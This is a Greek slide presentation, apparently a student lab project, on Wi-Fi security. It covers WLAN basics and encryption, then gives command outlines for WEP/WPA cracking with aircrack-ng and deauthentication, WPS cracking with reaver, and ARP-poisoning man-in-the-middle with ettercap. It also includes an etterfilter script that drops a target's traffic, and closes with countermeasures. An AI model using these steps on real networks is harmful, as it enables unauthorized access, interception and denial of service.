Κατέβασμα παρουσίασης
Η παρουσίαση φορτώνεται. Παρακαλείστε να περιμένετε
ΔημοσίευσεὈφιοῦχος Αγγελίδης Τροποποιήθηκε πριν 8 χρόνια
2
Είναι ένα σύστημα επικοινωνίας μέσω ηλεκτρομαγνητικών κυμάτων ανάμεσα σε σταθερούς και κινητούς χρήστες επιτρέποντας την μεταξύ τους διασύνδεση και ανταλλαγή δεδομένων.Ανάλογα με την λειτουργικότητά τους χωρίζονται σε: Ενσύρματα-Ασύρματα(φυσικό μέσο μετάδοσης). Δημόσια-Ιδιωτικά(τρόπος πρόσβασης). Τοπικά-Μητροπολιτικά-Ευρείας Κάλυψης(γεωγραφική κάλυψη) WLAN: Επιτρέπει πρόσβαση σε συγκεκριμένη γεωγραφική περιοχή χωρίς την παρουσία καλωδίων ή οπτικών ινών. Χρησιμοποιεί υπέρυθρες ή ραδιοσυχνότητες και τα δεδομένα μεταφέρονται μέσω ηλεκτρομαγνητικών σημάτων σε συχνότητες 2.4 και 5 GHz και στηρίζονται σε ένα σύνολο προτύπων του 802.11.
3
ΠΛΕΟΝΕΚΤΗΜΑΤΑ: Ευκολία-Άνεση Φορητότηρα Παραγωγηκότητα Ανάπτυξη «μετώπου» Δυνατότητα εξάπλωσης Κόστος ΜΕΙΟΝΕΚΤΗΜΑΤΑ: Ασφάλεια Περιοχή λειτουργίας Αξιοπιστία Ταχύτητα
4
Η ασφάλεια ενός ασύρματου δικτύου θα πρέπει να γίνει σε διάφορα επίπεδα με διάφορους τρόπους, για να είναι όσο το δυνατόν δυσκολότερο να δημιουργηθεί βλάβη στο δίκτυο ή αν γίνει, να είναι πολύ περιορισμένη. Λειτουργικό σύστημα Επίπεδο δικτύου ESSID Φίλτρο MAC διευθύνσεων IEEE 802.1x IEEE 802.Hi EAP WEP/WPA
5
Κρυπτογράφηση είναι ο μετασχηματισμός των δεδομένων σε μορφή που δεν μπορεί να διαβαστεί από κανέναν παρά μόνο από αυτόν που διαθέτει το κατάλληλο κλειδί. Υπάρχουν δύο οικογένειες αλγόριθμων κρυπτογράφησης: Οι συμμετρικοί αλγόριθμοι (ή αλγόριθμοι μυστικού κλειδιού) Οι ασύμμετροι αλγόριθμοι(ή αλγόριθμοι δημόσιου κλειδιού) WEP: Χρησιμοποιεί τον αλγόριθμο κρυπτογράφησης RC4, για τον οποίο πλέον υπάρχουν διαδεδομένες τεχνικές εύρεσης του μυστικού κλειδιού. WPA/WPA2: Θεωρείται το πιο ασφαλές πρωτόκολλο κρυπτογράφησης. Αντικατέστησε το ανασφαλές WEP και χρησιμοποιεί τον αλγόριθμο CCMP, ο οποίος βασίζεται στον AES.
6
ΠΑΘΗΤΙΚΕΣ: Ως παθητικές ορίζονται οι επιθέσεις που δε συμπεριλαμβάνουν συμμετοχή του επιτιθέμενου στο δίκτυο. Επίθεση τέτοιου τύπου αποτελεί η Λήψη Πληροφοριών( Snooping/Footprinting ) ΕΝΕΡΓΗΤΙΚΕΣ: Οι ενεργητικές επιθέσεις προϋποθέτουν ότι ο επιτιθέμενος αναλαμβάνει ενεργή συμμετοχή στο δίκτυο. Οι ενεργητικές επιθέσεις χωρίζονται, σύμφωνα με το σκοπό που έχουν οι επιτιθέμενοι, σε τέσσερις βασικές κατηγορίες: Ανάκτηση κωδικού(WEP/WPA/WPA-2 Cracking) Τροποποίηση Δεδομένων(Man in the Middle Attack) Μεταμφίεση(Spoofing) Άρνηση Υπηρεσιών(Denial of Service)
7
Η πειραματική διαδικασία γίνεται σε περιβάλλον UNIX και απαιτεί την χρήση: Laptop Desktop Ασύρματη κάρτα δικτύου(υποστήριξη λειτουργίας monitor mode) Δρομολογητής Διανομή Kali Linux Virtual Box Wireshark Ettercap Οι πιο διαδεδομένοι τρόποι εισβολής είναι οι εξής: Wi-Fi Cracking(WEP-WPA/WPA2) WPS cracking Man In The Middle Mac Spoofing DoS
9
airmon-ng airmon-ng start wlan0 Kill airodump-ng wlan0mon airodump-ng –c(channel) –w(new_file) -bssid(π.χ.14:60:80:9D:91:18) wlan0mon aircrack –ng new_file.cap
10
airmon-ng airmon-ng start wlan0 Kill airodump-ng wlan0mon airodump-ng –c (αριθμός καναλιού) –w(file_name) –bssid aireplay-ng -0 0 –a bssid wlan0mon aircrack-ng –w /path/wordlist new_file.cap
11
airmon-ng airmon-ng start wlan0 Kill wash -i wlan0mon reaver -i (monitormode) -c (channel) -b (targetbssid)–vv
12
ettercap –G Οptions->Set Netmask Sniff-> Uniffied sniffing hosts->scan for hosts->host list Mitm->ARP poisoning Sniff remote connections Start->start sniffing
13
Χρησιμοποιώντας τον Kwrite(text editor) γράφουμε το παρακάτω φίλτρο. if (ip.src == 'Target IP' || ip.dst == 'Target IP') { drop(); kill(); msg("Packet Dropped\n"); } Το αποθηκεύουμε ως dos.eft Ανοιγουμε γραμμή εντολών και πληκτρολογούμε: cd Desktop/ etterfilter dos.eft -o dos.ef Ανοίγουμε το ettercap. Sniff->Uniffied sniffing. Hosts->Scan for Hosts. Targets->Targets List->Add Target. Mitm->ARP Poisoning Φορτώνουμε το φίλτρο: Filters - Load Filter
14
1 2 3 4
16
WEP/WPA/WPA2 Για την προστασία μας χρησιμοποιούμε ένα σπάνιο SSID και ένα μεγάλο και πολύπλοκο passphrase για το δίκτυο μας το οποίο δεν περιέχει κοινές λέξεις όπως είναι ονόματα, τηλέφωνα και ημερομήνιες γέννησης. WPS Ο πιο απλός τρόπος προστασιά μας σε αυτήν την περίπτωση είναι να απενεργοποιήσουμε το WPS μας μπαίνοντας στην σελίδα του setup του δρομολογητή μας, ARP Poisoning Το πόσο εύκολο είναι ν' ανακαλύψουμε αν είμαστε το υποψήφιο θύμα μιας επίθεσης ARP poisoning εξαρτάται κυρίως από τα εργαλεία που έχουμε στη διάθεσή μας. Ένα από τα εργαλεία που ξεχωρίζει στην πλατφόρμα των Windows είναι το XArp, το οποίο παρεμπιπτόντως διατίθεται και για Linux.Επίσης αυτό που χρειάζεται να κάνει κάποιος είναι να χρησιμοποιήσει στατικές καταχωρήσεις στον πίνακα ARP. Σε έναν στατικό πίνακα ARP η διεύθυνση IP κάθε υπολογιστή του δικτύου είναι αντιστοιχισμένη μονοσήμαντα με μία διεύθυνση MAC. Έτσι, είναι πρακτικά αδύνατον κάποιος να αλλάξει τις αντιστοιχίσεις
17
Αλλαγή κωδικού πρόσβασης στον εξοπλισμό Αλλαγη της προεπιλεγμένης IP διεύθυνσης του εξοπλισμού Απόκρυψη/Αλλαγή SSID Ενεργοποίηση κρυπτογράφησης(WPA,WPA-2,WEP) MAC filtering Απενεργοποίηση της ασύρματης διαχείρισης του εξοπλισμού Απενεργοποιήση της απομακρυσμένης πρόσβασης Μειωση της ισχύος εκπομπής του ασύρματου μέσου πρόσβασης FIREWALLS VPN’s RADIUS INTRUSION DETECTION SYSTEMS(IDSS)
Παρόμοιες παρουσιάσεις
© 2024 SlidePlayer.gr Inc.
All rights reserved.